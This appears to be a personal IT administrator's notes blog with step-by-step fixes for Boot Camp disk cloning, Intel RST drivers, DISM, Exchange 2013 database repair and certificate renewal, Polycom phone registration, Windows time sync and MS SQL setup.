  • -resize the Windows Boot Camp partition (gparted).
  • -sync the partition tables (gparted).
  • -resize the OSX partition (diskutil).
  • -fix the Windows bootloader (Windows).



-usb with ubcd with parted magic (UBCD is universal boot cd).
-host system.
-Windows 7/8 cd/usb (or a Windows repair disk).


-plug both ssd's into the host system.
-boot via usb.
-start parted-magic.
-start clonezilla
-clone disk to disk
-wait till finished
(this could take awhile)


-you should still be in parted-magic
-start gparted
-resize windows partition as needed (grab the handles)
-move windows partition to the end
-move the osx recovery boot loader next to the windows partition
-apply changes
-after it's finished, if needed, you can fix the filesystem for both OSX and WINDOWS.


-you should still be in parted-magic
-open terminal
-type: sudo gptsync /dev/sda (or other device such as sdb sdc sdd. gparted will show you).
-confirm Y


-boot into os x with the new, larger hd.
-open Disk Utility.
-click the disk on the left hand side.
-click the PARITION button (at the top).
-select the volume you want to grow.
-look at the info-window (at the bottom).
-note the Disk Identifier (mine was disk0s2).
-open Terminal.
-type the following command: diskutil resizeVolume /dev/disk0s2 limits
-it will show the current size, minimum size and maximum size.
-note the maximum size (mine was 254.2GB. Do not get the part in parentheses.)
-type the following command: sudo diskutil resizeVolume /dev/disk0s2 254.2GB
(NOTE: the number above requires a GB but no space.)
-enter your password if prompted.


This also works if you get messages like "No boot device found" etc.

This happens when the items get fouled up. How do you know if items are fouled up?
Boot MacBook Pro to Windows either:
-through holding the OPTION key on boot up (after chime).
-boot into OSX and go to SYSTEM-PREFERENCES and choose the START-UP DISK.
-you will see "No boot device" or Windows is going into repair mode on it's own.

In either case, the following will work as a full instruction set. Adjust as needed.

-insert Windows 7/8 cd/usb (or a Windows repair disk).
-boot while holding OPTION key.
-wait for windows 7 cd/usb shows (it could take a minute).
-select Windows 7.
-select your language.
-click NEXT.
-select REPAIR YOUR COMPUTER (bottom left).
-click NO (for automatic repair).
-click NEXT (at bottom right).
-type: bootrec /scanos.
(If it isn't already there, it should find the WINDOWS installation and ask if you want to add it.)
-type: Y

-type: Diskpart
-type: LIST DISK
-type: SELECT DISK 0 (change this to the number of the disk . most likely 0)
-type: SELECT PARTITION 4 (change this to your partition number. most likely 4)
(it will show the details of the partition. We're trying to find the partition with the windows installation.)
-if you found it, it will probably say ACTIVE: NO
-type: ACTIVE
-type: EXIT

-type: bootrec /fixmbr (needed?)
-type: bootrec /fixboot (needed?)
-type: bootrec /rebuildbcd
-type: exit
-click RESTART


-when it restarts it will do a chkdsk.
-let it finish.
-it will reboot.
-voila! You can bootcamp Windows!


For diagnostic information, this is provided.

-boot to osx
-open terminal
-type: diskutil list
-type: sudo gpt -r -vv show disk0
-type: sudo fdisk /dev/disk0


boot manager: manages your booting process. This can actually be changed to REFIND, PLOP, LILO, GRUB2 and a few others. Fun stuff! Not for the faint of heart! (see here for boot loaders https://en.wikipedia.org/wiki/Comparison_of_boot_loaders)
boot loader: load an OS kernel and hand off control of the computer to that kernel.
kernel: loads the booting os





Last Updated on Friday, 24 June 2016 13:51

Intel Rapid Storage Technology (RST) (IRST)

I was going to write a blog post about SATA, AHCI, RAID, RST, IRST, ICH10R, X58 and the drivers needed along with the settings and the difference between the drivers and the software but this post does a better job than I ever would be able to (as well as better explanation than Intel does too):

I will say that the SATA/AHCI/RAID/IRST drivers are driving the southbridge (ICH10R, etc) which is the HOST-CONTROLLER (aka DISK-CONTROLLER aka STORAGE-CONTROLLER) and that the CHIPSET drivers are driving the northbridge (X58, etc).

Also, I will say that the speed of the SATA-I (150MB), SATA-II (300MB) or SATA-III (600MB) depends on both the HARD-DRIVE itself and the HOST-CONTROLLER. The easy ways to find the HOST-CONTROLLER speed is by using CPUID or HWINFO.

Lastly, I'll say that you only need the RST if you are running in AHCI or RAID mode. If not, then you can use the chipset drivers.

Here's how:

  • 1 -if you are in IDE mode, change to AHCI mode:
    For Windows 7, change the registry. In cmd (as admin), type: echo y | reg add "HKLM\System\CurrentControlSet\Services\Msahci" /v Start /d 0
    For Windows 10, set to boot into safe mode with msconfig. You will need your local admin password, no domain or Microsoft accounts can access safe mode.
  • 2 -reboot
  • 3 -In the bios, the SATA drive should be set to AHCI (not IDE).
    Dell systems automatically are set to RST/RAID. I guess so that it is flexible in case someone wants to setup a RAID, they can without too much difficulty. Also, there is a little boost in performance. I have witnessed the extremely slow systems due to incorrect RST drivers, even on new systems. The RST drivers need to be updated as this is can be a limiting factor. In some cases (Optiplex/Inspirion All in One pc's), Dell is not providing updated RST drivers and you must source them from Intel.
  • 4 -reboot.
    For Windows 10, set to boot into normal mode with msconfig.
  • 5 -reboot.
  • 6 -install the newest RST drivers for your chipset.

-SSD's should be set to RAID/RST as there will be a little boost in performance.
-ICH10R can only go to RST v11.
-as of this writing the RST v15 is the newest.
-you will need a couple of reboots, in case you couldn't tell.
-use HWinfo to get the motherboard chipset.
-it will say something like "QM77 series." That is the "Mobile 7 Series."
-Mobile 7 Series pairs with IRST v13 available at the Intel web site.
-the Intel-Update utility does not update the IRST to the newest version automatically.
-again, the Dell web site does not provide updated RST drivers and you must source them from Intel.
-for IRST, there are DRIVERS and there is the IRST program. You need the drivers (typically x64). The program is not needed.
-device-manager > storage-controllers
-right-click > properties
-driver > update-driver
-browse-my-computer > path to the newest IRST drivers.

Last Updated on Wednesday, 13 March 2019 13:57

Quickbooks 2011 on Mac El Capitan

Don't believe QUICKBOOKS support when they tell you that you have to upgrade to the newest version of QUICKBOOKS for MAC. QUICKBOOKS 2011 will work fine.

In the spirit of "just fix it" here's how:


Windows Package Manager

You're familiar with RPM. Windows has a similar package manager. Windows has something similar for Windows packages only.

It should be called WPM for Windows Package Manager but it's called DISM for Deployment Image Servicing and Management.

<tirade>Can they not come up with something all by themselves that works? Must they continuously ripoff open-source projects and change a certain percentage so that they can get around law? Then be so terrible at implementation that it would be graded as a D project?</tirade>

Show all Windows packages:

dism /online /get-packages /Format:Table

Find if a certain package is installed:

dism /online /get-packages |findstr KB2919355

Remove package:

dism /online /remove-package /packagename:Package_for_KB2919355~31bf3856ad364e35~amd64~~~

Scan to see if there is corruption:

dism /online /cleanup-image /scanhealth

Report if there is corruption:

dism /online /cleanup-image /checkhealth

Repair if there is corruption:

dism /online /cleanup-image /restorehealth

Restore to a source image:

dism /online /cleanup-image /restorehealth /source:wim:d:\your\source\here\install.wim:1 /limitaccess

Remove old versions of packages:

dism /online /cleanup-image /startcomponentcleanup

Lock in all packages and service-package so that they cannot be uninstalled:

dism /online /cleanup-image /startcomponentcleanup /resetbase

Bad Sectors on Disk

Check for Bad Sectors

Check to see if you have bad sectors on a disk:

  • -use HDTUNE

This will give a graphical representation of any bad sectors on the disk. It will mark it as red.

If you have bad sectors, it isn't the end of the world. We can mark them as bad so that those sectors won't be used any more. If you have 1-9 bad sectors, this isn't a problem. If you have more than 9 then most likely the issue will grow. More bad sectors will show and then the drive will become useless.

Fix Bad Sectors

Fix bad sectors on a disk:

  • -type: HDAT2
  • -select the disk by using the arrows keys on keyboard.
  • -hit ENTER.
  • -let it run all the way through.

In my experience, if too many bad sectors happen, it's easier to clone the drive and move on with the data loss. At that point, the data might be able to be replaced/repaired.

Cloning can be done with Clonzilla or many other tools. I prefer DDRESCUE as in this article.

Again, there are so manu tools in this area like DATA-LIFEGUARD, SEATOOLS, CRYSTALDISKINFO, etc that it's hard to know what to use and what not to bother with. The above reference of:

  • HDAT2

is a good start. I wish I retained all the info I've learned and used in the past but most of it escapes me now. No doubt that a data expert will have his or her own choice set of tools. I'd love to hear about them!

Dell Optiplex Wake On Lan Doesn't Work

Dell Optiplex Wake On Lan doesn't work even though the Wake On Lan setting is enabled.


This is because the DEEP SLEEP setting is ENABLED in the BIOS.

  • -enter BIOS.
  • -click DISABLED.
  • -click SAVE.

If that doesn't work, make sure the BIOS is the newest version.

Polycom Phone Set is "Not Registered"

A Polycom Phone Set (Fonality) is saying NOT REGISTERED in the http://cp.fonality.com
I guess this could be any Polycom Phone Set and Asterisk.)

Basically, the EXTENSION PASSWORD has to be typed into the PHONE SET. Here's how:

  • -click USERS/EXTENSION > VIEW USERS (at the top).
  • -click the EXTENSION you need to fix.
  • -expand the EXTENSION section (at the bottom).
  • -find SIP PASSWORD (on the right).
  • -click SHOW

This should show you the SIP PASSWORD which will be a random set of letters and numbers.

  • -find the IP of the phone set you want to change.
  • -login to that phone set via a web browser.
  • -USER: Polycom (case-sensitive) (or possibly there is no USER).
  • -PASS: 456 (or possibly the Fonality default password of: 9418941962).
  • -find the PASSWORD area.
  • -USER: should be the MAC of the phone (do not change this if something is already there).
  • -type in the password that it showed from the first section.

What threw me for a loop here is that the first time around, the SIP PASSWORD section wasn't showing. If the SIP PASSWORD section doesn't show:

  • -click APPLY ALL CHANGES (at the bottom) (yes, without changing anything).
  • -afterwards, the section should show.


If you have to manually do this:

-updated phone to newest firmware.
-cd /tftpboot
-changed the <mac>.cfg to refer the newest *.ld file
-ensure that the user is in the /etc/asterisk/sip.conf file. (case-sensitive)
-changed the <mac>-reg-basic.cfg to use the username/password that is in the sip.conf file. (case-sensitive)
-change the polycom.UC4.1.8.device-<site>.cfg to TFTP from the local server (rather than FTP to the hq server).

-the <mac>.cfg should just have the rest of the *.cfg files.
-the <mac>-reg-basic.cfg will have the setting for the phone-set to make calls.
-the <mac>-features.cfg will have the features of the phone such as background, volume, etc
-the <mac>-phone.cfg will have the phone overrides. Settings set by changing the settings on the phone set itself.
-the <mac>-web.cfg will have the web overrides. Settings set by changing the settings on the web site itself.
-the polycom.UC4.1.8.device-<site>.cfg will have the FTP/TFTP settings.

You're awesome!

Last Updated on Wednesday, 09 August 2017 15:34

Redirect HTTP to HTTPS in Exchange 2013

You have an EXCHANGE 2013 server.

This web site works: https://mail.domain.tld

This web site does not work: http://mail.domain.tld

You get an error message:
"HTTP ERROR 403.3 - Forbidden. The page you are tryig to acces is a secured with Secure Sockets Layer (SSL)."
"Server Error: 403 - Forbidden: Access is denied."

Here's how to fix:

  • -click ERROR PAGES (in the middle).
  • -click ADD (on the right).
  • -type: 403.4 (in STATUS CODE).
  • -type: https://mail.domain.tld
  • -click OK.


First of all, this can happen for many reasons. However, in my experience, this happens because the web site is required to have HTTPS and not HTTP. What is amazing here is a perfect scenario of different people groups think differently. Accordingly, the amount of mis-information on this is mind-boggling and complex.

For example, one MS article recommends to turn off SSL:

Ummm, that's a big NO. Recommending to do so is simply irresponsible.

Others recommend a complex setup for a URL-REWRITE, like this

Ummm, that's also a big NO.

Others recommend to do a HTTP REDIRECT on the OWA section of the web site:

Ummm, that's also a big NO. In fact, doing so will kill access to EXCHANGE altogether.

Like usual, the only way I found to handle this was through a comment on a random blog article here:

Exchange 2013 EDB File Repair and Restore

Messing around with EXCHANGE 2013 EDB files can be tricky. It's best to have a plan before you start typing in commands. Here's my cheat-sheet.



Again from last time, you can do this with StorageCraft. Paying the license is worth the hassle it saves and more affordable than dealing with MS SUPPORT.

I don't care how you do it, just do it. If it takes 2 hours to do, then wait the 2 hours for the copy to happen. If you have to run to the store to buy a spare HD, then run to the store. !!!DO NOT BE CARELESS WITH THE EDB FILE!!! Rather, perform your work on a working-copy.

$cd e:\exchange-repair\working-copy

$eseutil /mh '.\Mailbox Database FOO.edb'

$eseutil /r E00 /l E:\exchange-repair\working-copy /d E:\exchange-repair\working-copy

$eseutil /mh '.\Mailbox Database FOO.edb'

$eseutil /p '.\Mailbox Database FOO.edb'
(!!!CAUTION!!!: performing this will render the database with data loss.)

$New-MailboxDatabase -Server exchange-server-name -Name RecoveryDB -Recovery -EdbFilePath 'E:\exchange-repair\working-copy\Mailbox Database FOO.edb' -LogFolderPath 'E:\exchange-repair\working-copy\recoverylogs'

$dismount-database RDB
(There can only be 1 recovery database mounted at any one time. There can be more than 1 recovery datase connected. See the difference between CONNECTED & MOUNTED?

$Mount-Database RecoveryDB



$Get-MailboxStatistics -Database RecoveryDB | ft -auto

$Get-MailboxStatistics foo.user

$Get-MailboxStatistics -Database RecoveryDB | where mailboxguid -eq 24b5b78e-9396-456f-9ece-a5acaeb3e3e7



The RESTORE requires DisplayName, MailboxGUID, or LegacyExchangeDN. The most exact is the MAILBOXGUID since the DisplayName can be lengthy with spaces.

$Get-MailboxStatistics -Database RecoveryDB | ?{$_.DisplayName -like 'FirstNameHere*'} | fl DisplayName,MailboxGuid,DisconnectDate

It will spit out the mailbox accounts that match along with the GUIDs.

$New-MailboxRestoreRequest -SourceDatabase RecoveryDB -SourceStoreMailbox 28282f8e-e37b-4965-9dea-4e8658fada43 -TargetMailbox foo.user -AllowLegacyDNMismatch

-see the status of all the requests:

-see detail status of individual request:
$Get-MailboxRestoreRequestStatistics -Identity "foo.user\MailboxRestore"

-see the detail status of all the requests:
$Get-MailboxRestoreRequest | Get-MailboxRestoreRequestStatistics

-the request hangs around until you stop it. They are not automatically cleared. Only run this when the request is complete.
$Remove-MailboxRestoreRequest -Identity "foo.user\MailboxRestore"

-or remove all the completed requests:
$Get-MailboxRestoreRequest -Status Completed | Remove-MailboxRestoreRequest



Sometimes a user has the pst from their laptop and you can import that pst back into the edb. Don't worry, by default it doesn't duplicate items.

First, enable the import/export of .pst into a mailbox as it is not turned on by default:
$New-ManagementRoleAssignment -Role "Mailbox Import Export" -SecurityGroup "Organization Management"
-restart EMS (this means shut down your powershell and open it back up ;-))

-import a PST file into a user's primary mailbox
(NOTE: By default, the import checks for duplication of items and doesn't copy the data from the .pst file into the mailbox or archive if a matching item exists in the target mailbox or target archive.)
-you have to use the new-mailboximportrequest command. It requires UNC path (eg: \\exchange-server\foo-folder$). It will not work with an absolute path (C:\foo-folder\recovered.pst). Definitely an oversight.
-create an easy folder (i.e.: c:\foo-folder\)
-share the folder as a hidden share by putting a dollar-sign ($) behind the name (foo-folder$).
-grant full-access to 'exchange trusted subsystem'
(NTFS and Share permissions)

-import the pst:
$New-MailboxImportRequest -FilePath \\exchange-server\foo-folder$\Recovered.pst -Mailbox foo.user

-see the status of the import request:

-see the details of the import request:
$Get-MailboxImportRequestStatistics -Identity foo.user\mailboximport

-the request hangs around until you stop it. They are not automatically cleared. Only run this when the request is complete.
$Remove-MailboxImportRequest -Identity "foo.user\MailboxImport"

-or remove all the completed requests:
$Get-MailboxImportRequest -Status Completed | Remove-MailboxImportRequest



Hopefully, the syntax is becoming clearer. Let's see if you know what this is...

$Get-MoveRequest | $Get-MoveRequestStatistics
$Get-MoveRequest -MoveStatus Completed | Remove-MoveRequest



If for some reason you need to export a pst from the edb, you can do that too. Again, it can only be done to a UNC (eg: \\exchange-server\foo-folder$). It cannot be done to an absolute path (C:\foo-folder\recovered.pst). Definitely an oversight.

$New-MailboxExportRequest -Mailbox foo.user -FilePath "\\exchange-server\recovery$\foo.user.recovered.pst"
$Get-MailboxExportRequest | Get-MailboxExportRequestStatistics
$Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest



Throttling is done by the MRS. It it configured here:
C:\Program Files\Microsoft\Exchange Server\V15\Bin\MsExchangeMailboxReplication.exe.config

Do not try to mass import/export/move, unless you know what you are doing. The default settings for the MRS will most definitely bite you. The processes will error out and eventually die after 12 hours.

I wouldn't do more than 20 at a time. There's too many switches. Basically, the more you do at a time, the more resources it takes. The more resources it takes, the longer it takes. If you hit 12 hours, the request stalls. Yes, you can configure all of these settings if you really want to.

This is the best resource for more info:



  • Transferring from EDB into an empty mailbox is preferred. In my experience, it is much better. In my experience, mailbox to mailbox misses items and pst to mailbox misses items too.
  • If you can, import into a dummy mailbox account so that you can test and approve the contents before you import it into the real mailbox.
Last Updated on Wednesday, 02 May 2018 16:45

Network Node Central Management

What can I say?

  • PDQ
  • Lansweeper
  • LogicNow
  • Matrix42
Last Updated on Thursday, 04 February 2016 16:51

Exchange 2013 Failed to Mount Database

TL;DR: http://mikepfeiffer.net/2010/04/getting-an-exchange-database-into-a-clean-shutdown-state-using-eseutil/


Ughhh.... Users report that they can't access their email. Message is, "Microsoft.Exchange.Data.Stoarage.MailboxOfflineException"

Ok, so the Mailbox is offline. Why is it offline?

The database for the Exchange 2013 is broken into 3 different groups.

  • A-H
  • I-P
  • Q-Z

Databases I-P & Q-Z are working fine but database A-H won't mount.

Why won't it mount? It won't mount because it is corrupt.

How did it get like this? It got like this because EXCHANGE 2013 uses EDB files. It is a single file that stores everything. This file grows. Sooner or later it craps out. I'm not sure why but my guess is on NTFS.

If I check the EVENT LOG > APPLICATION, I see,

"Active Manager failed to mount the database Mailbox A-H. Error: An Active Manager operation failed. Error: The database action failed. Error: Operation failed with message: MapiExceptionDatabaseError: Unable to mount database. (hr=0x80004005, ec=1108)"

It gets worse, I'm also getting:
"Microsoft Exchange Information Store worker process (18152) has encountered and unexpected database error (Disk IO error) for database Mailbox A-H with a call stack of..."

And still worse:
"Database copy Mailbox A-H on this server appears to have a serious I/O error." "Service recovery was attempted by failover to another copy. Failover was unsuccessful in restoring the service. Error: There is only one copy of this mailbox database. Automatic recovery is not available."

And worse:
"Information Store - Mailbox A-H ; Database recovery/resotre failed with unexpected error - 1022"

And worse:
"Information store - Mailbox A-H: An attempt to write to the file "C:\Program Files\Microsoft\Exchange\V15\Mailbox\Mailbox Database 1889704935\Mailbox Database 1889704935.edb" at offset... bytes failed after 0.000 seconds with system error 665. The requested operation could not be complete due to a file system limitation. The writer operation will fail with error - 1022. If this error persists then the file may be damaged and may need to be restored from a previous backup."

All of this to say that the database is corrupt.

We got 2 options:

  1. restore from backup.
  2. repair database.

To repair:

  • cd \
  • cd \Program Files\Microsoft\Exchange Server\V15\Mailbox\Mailbox Database Foo\
  • eseutil /mh ".\database-name.edb"
  • eseutil /p ".\database-name.edb" /g

Then I moved all the log files away from Exchange log folder. First create a backup-directory, then move all the files into the backup-directory:

  • mkdir bkp
  • move * bkp

Then move the database-file.edb back where it came from:

  • cd bkp
  • move database-name.edb ..\

Now defrag the database-file.edb:

  • eseutil /d database-file.edb

Now check to see if the database-file.edb is OK:

  • eseutil /mh ".\database-name.edb"

Finally, mount the database:

  • $Mount-Database "database-name"

NOTE: you can run eseutil.exe /mh without effect. It is informational only.

In the end, it was easier to create a new database-name.edb and import the items needed via edbmails. Don't ask me why it took more than 24 hours to get to a solution that should have been the first option. This is exactly why I keep a note of items here.


Luckily, I called MS support. So you get the short of the conversation without having to pay ;-)

-too many log files.

-database file is too large. It is 539GB.

-ran eseutil /mh ".\database-name.edb"

-error 1811. Bad news.

-stop MS Exchange Information Store

-uninstall Veeam Backup


-get-mailboxdatabasecopystatus *

-wait for the databases to mount.

-shows "Dismounted"

-event-viewer > application and they see the same errors I already found.

-uninstall some programs that might be accessing the file.

-ran eseutil /mh ".\database-name.edb"

-error 1032. This means it's being used somewhere.

-storagecraft was trying to mount it.

-stop storagecraft service

-ran ran eseutil /mh ".\database-name.edb"


-see that the log-required is lengthy

-sequence is from E000015CD80 to E000015CDCF

-created new folder & moved the sequence into this new folder

-ran eseutil /ml ".\database-folder\new folder\E00"

-"no damaged log files were found"

-ran eseutil /r E00 /d ".\database-name\new folder" /l "new-folder" /S "new-folder" /a

-ran eseutil /r E00 /d ".\database-name\new folder" /l "new-folder" /S "new-folder" /i

-ran eseutil /mh ".\database-name.edb"


-copy the database-name.edb

-start a new database-name.edb (this will get everyone receiving email)

-repair the database-name.edb

-merge the file back into the new-database-name.edb


-get-exchangeserver | fl name,*admin*,*role*,*site*

-repair is 5-6GB per hour

-ran eseutil /p ".\old-database-name.edb"

-merge into new-database-name.edb

[PS] c:\users\admin> cd "C:\Program Files\Microsoft\Exchange Server\V14\Bin"

[PS] C:\Program Files\Microsoft\Exchange Server\V14\Bin>eseutil /r E00 /i /l 'Y:\ExchangeRestore\Mailbox Database' / 'Y:\ExchangeRestore\Mailbox Database'


StorageCraft to the rescue again with Granular Recovery for Exchange.

Testing it out now...

OK, I'm back. The StorageCraft GRE is a good tool. It does what eseutil should do but makes it easy for the stressed out administrator. It also has the added benefit of having granular restore. You can restore just one email.

If you have the budget, I recommend it. It's way better than EDBMAILS and other software I've tried.

Last Updated on Tuesday, 23 February 2016 17:13

Setting Windows Time - w32tm

Here's how this goes. There should only be one NTP SERVER on the network. You can have more but it would be redundant.


The domain-server should be set to sync with an external source.

  • -open POWERSHELL (as admin)
  • $w32tm /config /syncfromflags:manual /manualpeerlist:"0.pool.ntp.org 1.pool.ntp.org 2.pool.ntp.org 3.pool.ntp.org" /reliable:yes /update
  • $stop-service w32time
  • $sc stop w32time
  • $start-service w32time
  • $sc start w32time


The domain-clients should automatically get their time from the server. If for some reason, a domain-client doesn't, then force it:

  • -open POWERSHELL (as admin)
  • $w32tm /config /syncfromflags:domhier /update
  • $stop-service w32time
  • $sc stop w32time
  • $start-service w32time
  • $sc start w32time


If it is a VIRTUAL-OS, disable TIME-SYNCHRONIZATION from the HYPER-V settings:

  • -click on the VM
  • -click SETTINGS (on the right-hand side)
  • -scroll down to INTEGRATION SERVICES
  • -click OK

You can check to see if a NTP Server is working.


  • -check to see if an external NTP server is working.
  • -if you get an error, check to see if an internal NTP server is working.
  • -set the server to a working NTP server
  • External: $w32tm /config /syncfromflags:manual /manualpeerlist:"0.pool.ntp.org 1.pool.ntp.org 2.pool.ntp.org 3.pool.ntp.org" /reliable:yes /update
  • Internal: $w32tm /config /syncfromflags:manual /manualpeerlist: /reliable:yes /update

You can check the config:

  • $w32tm /query /configuration
  • $w32tm /query /status
  • $w32tm /query /source
  • External-check: $w32tm /monitor /computers:pool.ntp.org
  • Internal-check: $w32tm /monitor /computers:

Some recommend (I have not tried this):

  • -force the VIRTUAL-HOST to use an external source via regedits
  • -set the external: $w32tm /config /syncfromflags:manual /manualpeerlist:"0.pool.ntp.org 1.pool.ntp.org 2.pool.ntp.org 3.pool.ntp.org" /reliable:yes /update
  • $stop-service w32time
  • $start-service w32time
  • -then set the VIRTUAL-OS to use the internal VIRTUAL-HOST: $w32tm /config /syncfromflags:manual /manualpeerlist: /reliable:yes /update
  • (rather than through INTEGRATION SERVICES)
  • $stop-service w32time
  • $start-service w32time

Some recommend (I have not tried this):

-set the VIRTUAL-OS to use the internal VIRTUAL-HOST via INTEGRATON SERVICES

The issue is usually around the vmitimesync.

I'll update this when needed. So far, I simply sync'd to external on 1 server and sync'd everything else to that. Seems to work. I'll post when I run into issues.

Last Updated on Sunday, 10 September 2017 18:38

Expired Certificate on Exchange 2013

So your CERTIFICATE expired on your EXCHANGE 2013. No one can access email and you are being innundated with phone calls, pop-ins and text messages to notify you that "email isn't working" or "OUTLOOK isn't working."

We've all been there. If not, you will be there some day. Sometimes this even happens on very large email systems. There was a similar story recently where google.com didn't register their domain name (http://www.businessinsider.com/this-guy-bought-googlecom-from-google-for-one-minute-2015-9).
[I like to put these story links in here to let you know that you are not alone. It happens to just about everyone.]

This happens because CERTIFICATES are installed for multiple years terms; 2 years, 3 years, 5 years, 10 years, etc. And the expiration notices are going to a non-personal email account that no one regularly checks (like This e-mail address is being protected from spambots. You need JavaScript enabled to view it ) or to an email account that doesn't exist anymore.

Then the certificate expires and you wake up to voicemails and texts if you are in a worldwide company.

It's best to have a plan written out so you can follow it to fix quickly rather than use that time as a learning experience. Let me say it again with emphasis... FIX IT AS FAST AS POSSIBLE!

Here's how:


  • -click SERVER-MANAGER.
  • -click TOOLS > IIS MANAGER.
  • -click YOUR-SERVER-NAME (on the left-hand side).
  • -double-click SERVER-CERTIFICATES (in the middle).

This will list out all the PERSONAL CERTIFICATES installed on the server. You will see the expired certificate in the list.


Before you go any further, view the expired-certificate to write down the SUBJECT ALTERNATIVE NAMEs

  • -click on the EXPIRED-CERTIFICATE.
  • -click VIEW (on the right-hand side).
  • -click DETAILS (at the top).
  • -scroll down to SUBJECT ALTERNATIVE NAME.
  • -write down all the names (in the lower box at the bottom).

The reason this is important is because if you are access an email server called "mail.domain.tld" via a web site and you don't have that SUBJECT ALTERNATIVE NAME in the CERTIFICATE, then it will complain. And since EXCHANGE needs to have the local FULL QUALIFIED DOMAIN NAME (FQDN) (ie server.domain.tld), the EXTERNAL DOMAIN NAME (mail.domain.tld) and the AUTODISCOVERY NAME (autodiscover.domain.tld), it's important not to miss one of the names. If you do, you have to re-issue the CERTIFICATE and it can lead to longer down time.


  • -click CREATE CERTIFICATE REQUEST (on the right-hand side).
  • COMMON NAME: domain.tld
  • ORGANIZATION: Company Name
  • ORGANIZATION UNIT: Domain Control Validated
  • CITY: Jupiter
  • COUNTRY: us
  • For Cryptographic service provider, select "Microsoft RSA SChannel Cryptographic Provider".
    For Bit length, select 2048 or higher, and then click Next.
  • -save the CSR on the server and call it mail.domain.tld.csr
  • -this is a typical text file. Open it up with NOTEPAD.
  • -copy the entire contents (yes, even the "-----BEGIN NEW CERTIFICATE REQUEST-----")
  • -paste it into the web ONLINE APPLICATION (in your account at GODADDY, ENOM, NETWORK-SOLUTIONS, etc).
  • -wait a few minutes (about 2 minutes).
  • -download it. It will be named mail.domain.tld.cer and it might have an INTERMEDIATE CERTIFICATE.



There are ROOT CERTIFICATES installed on every device. These come from companies named like EQUIFAX, GEOTRUST, VERISIGN, THAWTE, GTE, MICROSOFT, etc. These are installed during the time of OS installation or through an update. In this case, Windows Update. But it can also happen durning iOS update.

Sometimes these ROOT COMPANIES can be viewed as manufacturers who do not do business with end-users directly. You have to use a dealer of their product.

Consequently, these dealers need to be installed. These come from companies named like RAPIDSSL, GODADDY, etc.


  • -click START > RUN
  • -type: mmc
  • -click FILE > ADD/REMOVE-SNAP-IN (at the top).
  • -select CERTIFICATES (from the list on the left).
  • -click ADD (in the middle).
  • -click FINISH > OK (at the bottom).

The CERTIFICATE MANAGER shows. On the left are the different STORES and in the middle are the different CERTIFICATES.

  • -click to expand the CERTIFICATES (on the left-hand side).
  • -click ALL-TASKS > IMPORT
  • -click NEXT > BROWSE
  • -find FILE-NAME (at the very bottom).
  • -select "PKCS #7 CERTIFICATES (*.spc;*.p7b)" (in the dropdown to the right).
  • -select the INTERMEDIATE CERTIFICATE that you downloaded from your DOMAIN-PROVIDER (godaddy, rapidssl, etc). It might be called something like *_iis_intermediates.p7b
  • -click NEXT
  • -click BROWSE
  • -click OK
  • -click NEXT > FINISH
  • -exit out of the window.
  • -click NO (when it asks if you want to save).


  • -click SERVER-MANAGER.
  • -click TOOLS > IIS MANAGER.
  • -click YOUR-SERVER-NAME (on the left-hand side).
  • -double-click SERVER-CERTIFICATES (in the middle).
  • -click COMPLETE CERTIFICATE REQUEST (on the right-hand side).
  • -select the mail.domain.tld.cer or mail.domain.tld.crt (that was downloaded from the domain provider).
    (Note that you it will look for a *.cer automatically; simply change it to *.* and use the .crt file and it will still work.)
  • -type a "Friendly Name": mail.domain.tld
  • -select PERSONAL (for the CERTIFICATE STORE).
  • -click OK
  • -the CERTIFICATE should now show in your list of CERTIFICATES
  • -if needed, highlight the EXPIRED-CERTIFICATE and click REMOVE (on the right-hand side)


Even though the CERTIFICATE is installed. It isn't being used until you BIND the CERTIFICATE to the service (SMTP, WEBSITE, etc).


  • -click to expand the SERVER-NAME (on the left-hand side).
  • -click to expand SITES (on the left-hand side).
  • -you will see all the WEBSITES (on your server). Typically, there is DEFAULT-WEB-SITE & EXCHANGE-BACK-END
  • -click BINDINGS (on the right-hand side)
  • -select HTTPS-444-* (in the middle)
  • -click EDIT (on the right-hand side)
  • -select mail.domain.tld (in the dropdown selection under SSL CERTIFICATE
  • -click OK > CLOSE


  • -click DEFAULT WEB SITE (on the left-hand side)
  • -click BINDINGS (on the right-hand side)
  • -select HTTPS-443-* (in the middle)
  • -click EDIT (on the right-hand side)
  • -select mail.domain.tld (in the dropdown selection under SSL CERTIFICATE
  • -click OK
  • -select HTTPS-443- (in the middle)
  • -click EDIT (on the right-hand side)
  • -select mail.domain.tld (in the dropdown selection under SSL CERTIFICATE)
  • -click OK > CLOSE


  • -right-click the SERVER-NAME (on the left-hand side).
  • -click STOP
  • -wait for it to stop. It might take 2 minutes or so.
  • -right-click the SERVER-NAME (on the left-hand side).
  • -click START

That should do it!!! Visit your web site at mail.domain.tld and you should be OK with the CERTIFICATE. With this plan in place, you should be able to fix your certificate issue within a few minutes.

Last Updated on Wednesday, 12 February 2020 11:30

MS SQL Setup

MS SQL setup is a PITA. Here are a few of my notes:

1-the install package is the only way to install databases. In other words, if you have one database and you want another, you have to go through the setup process again. So keep that SQL INSTALLATION SETUP file on the system.

2-the versions are wacky. There is:

  • SQL - costs for license.
  • SQL EXPRESS - free for up to 10GB.
  • SQL CE (or compact edition) - Meant to be used in use with an application.
  • SQLITE - I don't know what this is for.

3-to connect and manage the SQL, you have to install SQL MANAGEMENT STUDIO. Think of this as their version of PHPMYADMIN. It can actually control different versions at the same time. It can control a 2012 SQL database and a 2014 SQL database at the same time.

4-which leads me to my next point. SQL versions can coincide. Both 2012 and 2014 can run at the same time.

5-permissions are wacky. They just are. They can be either SQL permissions or they can be WINDOWS permissions. But even if you use SQL permissions, you might have to setup WINDOWS permissions anyway. This is for a local LAN installation.

6-when you install, it automatically adds your USERNAME as the owner of the database. This is required so that you can add/remove other user permissions.

7-to see/add/change/remove the permissions:
(good video to explain the below: https://www.youtube.com/watch?v=gsr8ID2pY-A&feature=youtu.be)

  • expand the DATABASE-INSTANCE name.
  • expand the SECURITY folder
  • expand the LOGINS folder
  • right-click LOGINS
  • click NEW-LOGIN

Here, you can see where the permission can be either WINDOWS or SQL.

I find it's easier to use the WINDOWS AUTHENTICATION (although it doesn't seem like it should be so). The reason is that when the APP SERVICE runs (whatever APP is being used), the SERVICE is being run as the current-logged-in-user. I find (and this may be incorrect) that if you use the SQL SERVER AUTHENTICATION (like I want to), then you also have to go back and add the current-logged-in-user as well. This can add up to quite the number if you have many users.

